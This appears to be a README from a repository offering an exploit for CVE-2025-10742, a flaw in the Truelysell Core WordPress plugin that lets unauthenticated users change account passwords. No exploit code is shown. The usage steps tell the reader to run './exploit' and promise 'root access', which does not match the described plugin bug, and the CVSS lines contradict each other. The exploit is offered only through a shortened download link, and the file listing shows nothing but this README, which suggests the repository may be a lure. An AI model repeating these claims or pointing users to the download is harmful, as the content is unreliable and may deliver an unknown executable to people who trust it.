# CVE-2025-10742
## Overview
The Truelysell Core plugin for WordPress introduces a security flaw that allows unauthorized users to change passwords of existing accounts
## Vulnerability Details
This vulnerability arises from insufficient access controls, enabling attackers to exploit the 'truelysell_edit_staff' shortcode without authentication. Consequently, unauthenticated individuals can manipulate user passwords, which poses a significant risk of unauthorized account access, including the potential compromise of administrator privileges. Website owners using affected plugin versions are urged to implement security measures and update to the latest version to safeguard their systems.
### CVSS V3.1
- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low
Understanding the nature of this vulnerability is crucial for system administrators and security professionals. Proper mitigation strategies can prevent unauthorized access.
### Important Note
Use this exploit responsibly and only on systems you own or have explicit permission to test.
## Example
Here is a simple example of how to use the exploit:
1. Open your terminal.
2. Run the exploit:
```bash
./exploit
```
3. If successful, you will see a message indicating that you have gained root access.
### Download [here](https://tinyurl.com/2w2ktfmd)
[4.0K] /data/pocs/8dc9f2f2485c475073d6cc26c5020e86187545c5
└── [1.4K] README.md
1 directory, 1 file